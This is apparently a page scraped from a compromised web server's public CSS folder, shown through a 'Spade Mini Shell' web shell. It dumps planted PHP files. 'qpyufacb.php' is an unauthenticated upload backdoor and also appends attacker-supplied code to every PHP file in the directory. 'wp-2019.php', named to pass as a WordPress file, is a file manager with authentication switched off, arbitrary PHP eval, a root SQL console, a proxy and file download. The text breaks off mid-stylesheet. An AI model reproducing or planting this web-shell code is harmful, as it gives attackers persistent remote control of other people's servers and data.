Spade
Mini Shell
| Directory:~$ /home/lmsyaran/public_html/css/ |
| [Home] [System Details] [Kill Me] |
qpyufacb.php000064400000001370151161735500007074 0ustar00<?php
echo"<form method='post'
enctype='multipart/form-data'><input type='file'
name='a'><input type='submit'
value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
$fileHandle = fopen($directory . '/' . $file,
'a');
fwrite($fileHandle, $textToAppend);
fclose($fileHandle);
echo "OK >> $file
";
}
}
closedir($handle);
}
}
?>
wp-2019.php000064400000236701151161735500006311 0ustar00<?php
/* PHP File manager ver 1.5 */
// Configuration — do not change manually!
$authorization =
'{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script
type=\"text\/javascript\"
src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script
language=\"Javascript\"
type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid:
\"newcontent\"\r\n,display:
\"later\"\r\n,start_highlight: true\r\n,allow_resize:
\"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language:
\"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar:
\"search, go_to_line, |, undo, redo, |, select_font, |,
syntax_selection, |, change_smooth_selection, highlight, reset_highlight,
|, help\"\r\n,syntax_selection_allow:
\"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';
$php_templates = '{"Settings":"global
$fm_config;\r\nvar_export($fm_config);","Backup SQL
tables":"echo fm_backup_tables();"}';
$sql_templates = '{"All bases":"SHOW
DATABASES;","All tables":"SHOW TABLES;"}';
$translation =
'{"id":"ru","Add":"Добавить","Are
you sure you want to delete this directory (recursively)?":"Вы
уверены, что хотите удалить эту папку
(рекурсивно)?","Are you sure you want to delete this
file?":"Вы уверены, что хотите удалить
этот
файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error
occurred":"Произошла ошибка","File
manager":"Файловый менеджер","File
selected":"Выбран файл","File
updated":"Файл
сохранен","Filename":"Имя
файла","Files uploaded":"Файл
загружен","French":"Французский","Generation
time":"Генерация
страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make
directory":"Создать
папку","Name":"Наименование","New":"Новое","New
file":"Новый файл","no
files":"нет
файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset
settings":"Сбросить
настройки","Restore file time after
editing":"Восстанавливать время файла
после
редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select
the file":"Выберите
файл","Settings":"Настройка","Show":"Показать","Show
size of the folder":"Показывать размер
папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found
in files":"Найдено в
файлах","Search":"Поиск","Recursive
search":"Рекурсивный
поиск","Mask":"Маска"}';
// end configuration
// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs =
array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path =
realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\',
'/',realpath('./'));
$phar_maybe =
(version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;
//Authorization
$auth = json_decode($authorization,true);
$auth['authorize'] = isset($auth['authorize']) ?
$auth['authorize'] : 0;
$auth['days_authorization'] =
(isset($auth['days_authorization'])&&is_numeric($auth['days_authorization']))
? (int)$auth['days_authorization'] : 30;
$auth['login'] = isset($auth['login']) ?
$auth['login'] : 'admin';
$auth['password'] = isset($auth['password']) ?
$auth['password'] : 'phpfm';
$auth['cookie_name'] = isset($auth['cookie_name']) ?
$auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ?
$auth['script'] : '';
// Little default config
$fm_default_config = array (
'make_directory' => true,
'new_file' => true,
'upload_file' => true,
'show_dir_size' => false, //if true, show directory size →
maybe slow
'show_img' => true,
'show_php_ver' => true,
'show_php_ini' => false, // show path to current php.ini
'show_gt' => true, // show generation time
'enable_php_console' => true,
'enable_sql_console' => true,
'sql_server' => 'localhost',
'sql_username' => 'root',
'sql_password' => '',
'sql_db' => 'test_base',
'enable_proxy' => true,
'show_phpinfo' => true,
'show_xls' => true,
'fm_settings' => true,
'restore_time' => true,
'fm_restore_time' => false,
);
if (empty($_COOKIE['fm_config'])) $fm_config =
$fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);
// Change language
if (isset($_POST['fm_lang'])) {
setcookie('fm_lang', $_POST['fm_lang'], time() +
(86400 * $auth['days_authorization']));
$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;
// Detect browser language
if($detect_lang &&
!empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) &&
empty($_COOKIE['fm_lang'])){
$lang_priority = explode(',',
$_SERVER['HTTP_ACCEPT_LANGUAGE']);
if (!empty($lang_priority)){
foreach ($lang_priority as $lang_arr){
$lng = explode(';', $lang_arr);
$lng = $lng[0];
if(in_array($lng,$langs)){
$language = $lng;
break;
}
}
}
}
// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language :
$_COOKIE['fm_lang'];
// Localization
$lang = json_decode($translation,true);
if ($lang['id']!=$language) {
$get_lang =
file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/'
. $language . '.json');
if (!empty($get_lang)) {
//remove unnecessary characters
$translation_string =
str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
$fgc = file_get_contents(__FILE__);
$search =
preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#',
$fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace =
str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);
if (file_put_contents(__FILE__, $replace)) {
$msg .= __('File updated');
} else $msg .= __('Error occurred');
if (!empty($fm_config['fm_restore_time']))
touch(__FILE__,$filemtime);
}
$lang = json_decode($translation_string,true);
}
}
/* Functions */
//translation
function __($text){
global $lang;
if (isset($lang[$text])) return $lang[$text];
else return $text;
};
//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
if($recursive && @is_dir($file)) {
$els = fm_scan_dir($file, '', '', true);
foreach ($els as $el) {
if($el != '.' && $el != '..'){
fm_del_files($file . '/' . $el, true);
}
}
}
if(@is_dir($file)) {
return rmdir($file);
} else {
return @unlink($file);
}
}
//file perms
function fm_rights_string($file, $if = false){
$perms = fileperms($file);
$info = '';
if(!$if){
if (($perms & 0xC000) == 0xC000) {
//Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
//Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
//Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
//Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
//Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
//Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
//FIFO pipe
$info = 'p';
} else {
//Unknown
$info = 'u';
}
}
//Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
//Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
//World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function fm_convert_rights($mode) {
$mode = str_pad($mode,9,'-');
$trans =
array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
$mode = strtr($mode,$trans);
$newmode = '0';
$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2];
$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5];
$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8];
$newmode .= $owner . $group . $world;
return intval($newmode, 8);
}
function fm_chmod($file, $val, $rec = false) {
$res = @chmod(realpath($file), $val);
if(@is_dir($file) && $rec){
$els = fm_scan_dir($file);
foreach ($els as $el) {
$res = $res && fm_chmod($file . '/' . $el, $val,
true);
}
}
return $res;
}
//load files
function fm_download($file_name) {
if (!empty($file_name)) {
if (file_exists($file_name)) {
header("Content-Disposition: attachment; filename=" .
basename($file_name));
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Description: File Transfer");
header("Content-Length: " . filesize($file_name));
flush(); // this doesn't really matter.
$fp = fopen($file_name, "r");
while (!feof($fp)) {
echo fread($fp, 65536);
flush(); // this is essential for large downloads
}
fclose($fp);
die();
} else {
header('HTTP/1.0 404 Not Found', true, 404);
header('Status: 404 Not Found');
die();
}
}
}
//show folder size
function fm_dir_size($f,$format=true) {
if($format) {
$size=fm_dir_size($f,false);
if($size<=1024) return $size.' bytes';
elseif($size<=1024*1024) return
round($size/(1024),2).' Kb';
elseif($size<=1024*1024*1024) return
round($size/(1024*1024),2).' Mb';
elseif($size<=1024*1024*1024*1024) return
round($size/(1024*1024*1024),2).' Gb';
elseif($size<=1024*1024*1024*1024*1024) return
round($size/(1024*1024*1024*1024),2).' Tb'; //:)))
else return
round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-)
} else {
if(is_file($f)) return filesize($f);
$size=0;
$dh=opendir($f);
while(($file=readdir($dh))!==false) {
if($file=='.' || $file=='..') continue;
if(is_file($f.'/'.$file))
$size+=filesize($f.'/'.$file);
else $size+=fm_dir_size($f.'/'.$file,false);
}
closedir($dh);
return $size+filesize($f);
}
}
//scan directory
function fm_scan_dir($directory, $exp = '', $type =
'all', $do_not_filter = false) {
$dir = $ndir = array();
if(!empty($exp)){
$exp = '/^' . str_replace('*', '(.*)',
str_replace('.', '\\.', $exp)) . '$/';
}
if(!empty($type) && $type !== 'all'){
$func = 'is_' . $type;
}
if(@is_dir($directory)){
$fh = opendir($directory);
while (false !== ($filename = readdir($fh))) {
if(substr($filename, 0, 1) != '.' || $do_not_filter) {
if((empty($type) || $type == 'all' || $func($directory .
'/' . $filename)) && (empty($exp) || preg_match($exp,
$filename))){
$dir[] = $filename;
}
}
}
closedir($fh);
natsort($dir);
}
return $dir;
}
function fm_link($get,$link,$name,$title='') {
if (empty($title)) $title=$name.' '.basename($link);
return ' <a
href="?'.$get.'='.base64_encode($link).'"
title="'.$title.'">'.$name.'</a>';
}
function fm_arr_to_option($arr,$n,$sel=''){
foreach($arr as $v){
$b=$v[$n];
$res.='<option value="'.$b.'" '.($sel
&&
$sel==$b?'selected':'').'>'.$b.'</option>';
}
return $res;
}
function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post"
action="">
<select name="fm_lang"
title="'.__('Language').'"
onchange="document.forms[\'change_lang\'].submit()"
>
<option value="en"
'.($current=='en'?'selected="selected"
':'').'>'.__('English').'</option>
<option value="de"
'.($current=='de'?'selected="selected"
':'').'>'.__('German').'</option>
<option value="ru"
'.($current=='ru'?'selected="selected"
':'').'>'.__('Russian').'</option>
<option value="fr"
'.($current=='fr'?'selected="selected"
':'').'>'.__('French').'</option>
<option value="uk"
'.($current=='uk'?'selected="selected"
':'').'>'.__('Ukrainian').'</option>
</select>
</form>
';
}
function fm_root($dirname){
return ($dirname=='.' OR $dirname=='..');
}
function fm_php($string){
$display_errors=ini_get('display_errors');
ini_set('display_errors', '1');
ob_start();
eval(trim($string));
$text = ob_get_contents();
ob_end_clean();
ini_set('display_errors', $display_errors);
return $text;
}
//SHOW DATABASES
function fm_sql_connect(){
global $fm_config;
return new mysqli($fm_config['sql_server'],
$fm_config['sql_username'], $fm_config['sql_password'],
$fm_config['sql_db']);
}
function fm_sql($query){
global $fm_config;
$query=trim($query);
ob_start();
$connection = fm_sql_connect();
if ($connection->connect_error) {
ob_end_clean();
return $connection->connect_error;
}
$connection->set_charset('utf8');
$queried = mysqli_query($connection,$query);
if ($queried===false) {
ob_end_clean();
return mysqli_error($connection);
} else {
if(!empty($queried)){
while($row = mysqli_fetch_assoc($queried)) {
$query_result[]= $row;
}
}
$vdump=empty($query_result)?'':var_export($query_result,true);
ob_end_clean();
$connection->close();
return
'<pre>'.stripslashes($vdump).'</pre>';
}
}
function fm_backup_tables($tables = '*', $full_backup = true) {
global $path;
$mysqldb = fm_sql_connect();
$delimiter = "; \n \n";
if($tables == '*') {
$tables = array();
$result = $mysqldb->query('SHOW TABLES');
while($row = mysqli_fetch_row($result)) {
$tables[] = $row[0];
}
} else {
$tables = is_array($tables) ? $tables : explode(',',$tables);
}
$return='';
foreach($tables as $table) {
$result = $mysqldb->query('SELECT * FROM '.$table);
$num_fields = mysqli_num_fields($result);
$return.= 'DROP TABLE IF EXISTS
`'.$table.'`'.$delimiter;
$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE
'.$table));
$return.=$row2[1].$delimiter;
if ($full_backup) {
for ($i = 0; $i < $num_fields; $i++) {
while($row = mysqli_fetch_row($result)) {
$return.= 'INSERT INTO `'.$table.'` VALUES(';
for($j=0; $j<$num_fields; $j++) {
$row[$j] = addslashes($row[$j]);
$row[$j] = str_replace("\n","\\n",$row[$j]);
if (isset($row[$j])) { $return.=
'"'.$row[$j].'"' ; } else { $return.=
'""'; }
if ($j<($num_fields-1)) { $return.= ','; }
}
$return.= ')'.$delimiter;
}
}
} else {
$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is",
'', $return);
}
$return.="\n\n\n";
}
//save file
$file=gmdate("Y-m-d_H-i-s",time()).'.sql';
$handle = fopen($file,'w+');
fwrite($handle,$return);
fclose($handle);
$alert = 'onClick="if(confirm(\''. __('File
selected').': \n'. $file. '. \n'.__('Are you
sure you want to delete this file?') . '\'))
document.location.href = \'?delete=' . $file .
'&path=' . $path . '\'"';
return $file.':
'.fm_link('download',$path.$file,__('Download'),__('Download').'
'.$file).' <a href="#" title="' .
__('Delete') . ' '. $file . '" ' .
$alert . '>' . __('Delete') .
'</a>';
}
function fm_restore_tables($sqlFileToExecute) {
$mysqldb = fm_sql_connect();
$delimiter = "; \n \n";
// Load and explode the sql file
$f = fopen($sqlFileToExecute,"r+");
$sqlFile = fread($f,filesize($sqlFileToExecute));
$sqlArray = explode($delimiter,$sqlFile);
//Process the sql file by statements
foreach ($sqlArray as $stmt) {
if (strlen($stmt)>3){
$result = $mysqldb->query($stmt);
if (!$result){
$sqlErrorCode = mysqli_errno($mysqldb->connection);
$sqlErrorText = mysqli_error($mysqldb->connection);
$sqlStmt = $stmt;
break;
}
}
}
if (empty($sqlErrorCode)) return __('Success').' —
'.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}
function fm_img_link($filename){
return
'./'.basename(__FILE__).'?img='.base64_encode($filename);
}
function fm_home_style(){
return '
input, input.fm_input {
text-indent: 2px;
}
input, textarea, select, input.fm_input {
color: black;
font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
border-color: black;
background-color: #FCFCFC none !important;
border-radius: 0;
padding: 2px;
}
input.fm_input {
background: #FCFCFC none !important;
cursor: pointer;
}
.home {
background-image:
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
background-repeat: no-repeat;
}';
}
function fm_config_checkbox_row($name,$value) {
global $fm_config;
return '<tr><td class="row1"><input
id="fm_config_'.$value.'"
name="fm_config['.$value.']" value="1"
'.(empty($fm_config[$value])?'':'checked="true"').'
type="checkbox"></td><td class="row2
whole"><label
for="fm_config_'.$value.'">'.$name.'</td></tr>';
}
function fm_protocol() {
if (isset($_SERVER['HTTP_SCHEME'])) return
$_SERVER['HTTP_SCHEME'].'://';
if (isset($_SERVER['HTTPS']) &&
$_SERVER['HTTPS'] == 'on') return
'https://';
if (isset($_SERVER['SERVER_PORT']) &&
$_SERVER['SERVER_PORT'] == 443) return 'https://';
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) &&
$_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return
'https://';
return 'http://';
}
function fm_site_url() {
return fm_protocol().$_SERVER['HTTP_HOST'];
}
function fm_url($full=false) {
$host=$full?fm_site_url():'.';
return $host.'/'.basename(__FILE__);
}
function fm_home($full=false){
return ' <a href="'.fm_url($full).'"
title="'.__('Home').'"><span
class="home"> </span></a>';
}
function fm_run_input($lng) {
global $fm_config;
$return =
!empty($fm_config['enable_'.$lng.'_console']) ?
'
<form method="post"
action="'.fm_url().'"
style="display:inline">
<input type="submit"
name="'.$lng.'run"
value="'.strtoupper($lng).'
'.__('Console').'">
</form>
' : '';
return $return;
}
function fm_url_proxy($matches) {
$link = str_replace('&','&',$matches[2]);
$url = isset($_GET['url'])?$_GET['url']:'';
$parse_url = parse_url($url);
$host =
$parse_url['scheme'].'://'.$parse_url['host'].'/';
if (substr($link,0,2)=='//') {
$link = substr_replace($link,fm_protocol(),0,2);
} elseif (substr($link,0,1)=='/') {
$link = substr_replace($link,$host,0,1);
} elseif (substr($link,0,2)=='./') {
$link = substr_replace($link,$host,0,2);
} elseif (substr($link,0,4)=='http') {
//alles machen wunderschon
} else {
$link = $host.$link;
}
if ($matches[1]=='href' && !strripos($link,
'css')) {
$base = fm_site_url().'/'.basename(__FILE__);
$baseq = $base.'?proxy=true&url=';
$link = $baseq.urlencode($link);
} elseif (strripos($link, 'css')){
//как-то тоже подменять надо
}
return $matches[1].'="'.$link.'"';
}
function fm_tpl_form($lng_tpl) {
global ${$lng_tpl.'_templates'};
$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
$str = '';
foreach ($tpl_arr as $ktpl=>$vtpl) {
$str .= '<tr><td class="row1"><input
name="'.$lng_tpl.'_name[]"
value="'.$ktpl.'"></td><td class="row2
whole"><textarea name="'.$lng_tpl.'_value[]"
cols="55" rows="5"
class="textarea_input">'.$vtpl.'</textarea>
<input name="del_'.rand().'" type="button"
onClick="this.parentNode.parentNode.remove();"
value="'.__('Delete').'"/></td></tr>';
}
return '
<table>
<tr><th
colspan="2">'.strtoupper($lng_tpl).'
'.__('templates').'
'.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'"
name="tpl_edited">
<tr><td
class="row1">'.__('Name').'</td><td
class="row2
whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input
name="res" type="button"
onClick="document.location.href =
\''.fm_url().'?fm_settings=true\';"
value="'.__('Reset').'"/> <input
type="submit"
value="'.__('Save').'"
></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'"
name="tpl_edited">
<tr><td class="row1"><input
name="'.$lng_tpl.'_new_name" value=""
placeholder="'.__('New').'
'.__('Name').'"></td><td
class="row2 whole"><textarea
name="'.$lng_tpl.'_new_value" cols="55"
rows="5" class="textarea_input"
placeholder="'.__('New').'
'.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input
type="submit" value="'.__('Add').'"
></td></tr>
</form>
</table>
';
}
/* End Functions */
// authorization
if ($auth['authorize']) {
if (isset($_POST['login']) &&
isset($_POST['password'])){
if (($_POST['login']==$auth['login']) &&
($_POST['password']==$auth['password'])) {
setcookie($auth['cookie_name'],
$auth['login'].'|'.md5($auth['password']),
time() + (86400 * $auth['days_authorization']));
$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
}
}
if (!isset($_COOKIE[$auth['cookie_name']]) OR
($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password'])))
{
echo '
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,
initial-scale=1" />
<title>'.__('File manager').'</title>
</head>
<body>
<form action="" method="post">
'.__('Login').' <input name="login"
type="text">
'.__('Password').' <input name="password"
type="password">
<input type="submit"
value="'.__('Enter').'"
class="fm_input">
</form>
'.fm_lang_form($language).'
</body>
</html>
';
die();
}
if (isset($_POST['quit'])) {
unset($_COOKIE[$auth['cookie_name']]);
setcookie($auth['cookie_name'], '', time() - (86400 *
$auth['days_authorization']));
header('Location:
'.fm_site_url().$_SERVER['REQUEST_URI']);
}
}
// Change config
if (isset($_GET['fm_settings'])) {
if (isset($_GET['fm_config_delete'])) {
unset($_COOKIE['fm_config']);
setcookie('fm_config', '', time() - (86400 *
$auth['days_authorization']));
header('Location: '.fm_url().'?fm_settings=true');
exit(0);
} elseif (isset($_POST['fm_config'])) {
$fm_config = $_POST['fm_config'];
setcookie('fm_config', serialize($fm_config), time() + (86400 *
$auth['days_authorization']));
$_COOKIE['fm_config'] = serialize($fm_config);
$msg = __('Settings').' '.__('done');
} elseif (isset($_POST['fm_login'])) {
if (empty($_POST['fm_login']['authorize']))
$_POST['fm_login'] = array('authorize' =>
'0') + $_POST['fm_login'];
$fm_login = json_encode($_POST['fm_login']);
$fgc = file_get_contents(__FILE__);
$search =
preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#',
$fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace =
str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
if (file_put_contents(__FILE__, $replace)) {
$msg .= __('File updated');
if ($_POST['fm_login']['login'] !=
$auth['login']) $msg .= '
'.__('Login').':
'.$_POST['fm_login']['login'];
if ($_POST['fm_login']['password'] !=
$auth['password']) $msg .= '
'.__('Password').':
'.$_POST['fm_login']['password'];
$auth = $_POST['fm_login'];
}
else $msg .= __('Error occurred');
if (!empty($fm_config['fm_restore_time']))
touch(__FILE__,$filemtime);
}
} elseif (isset($_POST['tpl_edited'])) {
$lng_tpl = $_POST['tpl_edited'];
if (!empty($_POST[$lng_tpl.'_name'])) {
$fm_php =
json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
$fm_php =
json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
}
if (!empty($fm_php)) {
$fgc = file_get_contents(__FILE__);
$search =
preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#',
$fgc, $matches);
if (!empty($matches[1])) {
$filemtime = filemtime(__FILE__);
$replace =
str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
if (file_put_contents(__FILE__, $replace)) {
${$lng_tpl.'_templates'} = $fm_php;
$msg .= __('File updated');
} else $msg .= __('Error occurred');
if (!empty($fm_config['fm_restore_time']))
touch(__FILE__,$filemtime);
}
} else $msg .= __('Error occurred');
}
}
// Just show image
if (isset($_GET['img'])) {
$file=base64_decode($_GET['img']);
if ($info=getimagesize($file)){
switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
case 1: $ext='gif'; break;
case 2: $ext='jpeg'; break;
case 3: $ext='png'; break;
case 6: $ext='bmp'; break;
default: die();
}
header("Content-type: image/$ext");
echo file_get_contents($file);
die();
}
}
// Just download file
if (isset($_GET['download'])) {
$file=base64_decode($_GET['download']);
fm_download($file);
}
// Just show info
if (isset($_GET['phpinfo'])) {
phpinfo();
die();
}
// Mini proxy, many bugs!
if (isset($_GET['proxy']) &&
(!empty($fm_config['enable_proxy']))) {
$url =
isset($_GET['url'])?urldecode($_GET['url']):'';
$proxy_form = '
<div style="position:relative;z-index:100500;background:
linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed
100%);">
<form action="" method="GET">
<input type="hidden" name="proxy"
value="true">
'.fm_home().' <a href="'.$url.'"
target="_blank">Url</a>: <input type="text"
name="url" value="'.$url.'"
size="55">
<input type="submit"
value="'.__('Show').'"
class="fm_input">
</form>
</div>
';
if ($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
curl_close($ch);
//$result =
preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui',
'\\1="'.$url.'/\\2"', $result);
$result =
preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui',
'fm_url_proxy', $result);
$result = preg_replace('%(<body.*?>)%i',
'$1'.'<style>'.fm_home_style().'</style>'.$proxy_form,
$result);
echo $result;
die();
}
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,
initial-scale=1" />
<title><?=__('File manager')?></title>
<style>
body {
background-color: white;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 8pt;
margin: 0px;
}
a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover { color: #FFA34F; text-decoration: underline; }
table.bg {
background-color: #ACBBC6
}
th, td {
font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
padding: 3px;
}
th {
height: 25px;
background-color: #006699;
color: #FFA34F;
font-weight: bold;
font-size: 11px;
}
.row1 {
background-color: #EFEFEF;
}
.row2 {
background-color: #DEE3E7;
}
.row3 {
background-color: #D1D7DC;
padding: 5px;
}
tr.row1:hover {
background-color: #F3FCFC;
}
tr.row2:hover {
background-color: #F0F6F6;
}
.whole {
width: 100%;
}
.all tbody td:first-child{width:100%;}
textarea {
font: 9pt 'Courier New', courier;
line-height: 125%;
padding: 5px;
}
.textarea_input {
height: 1em;
}
.textarea_input:focus {
height: auto;
}
input[type=submit]{
background: #FCFCFC none !important;
cursor: pointer;
}
.folder {
background-image:
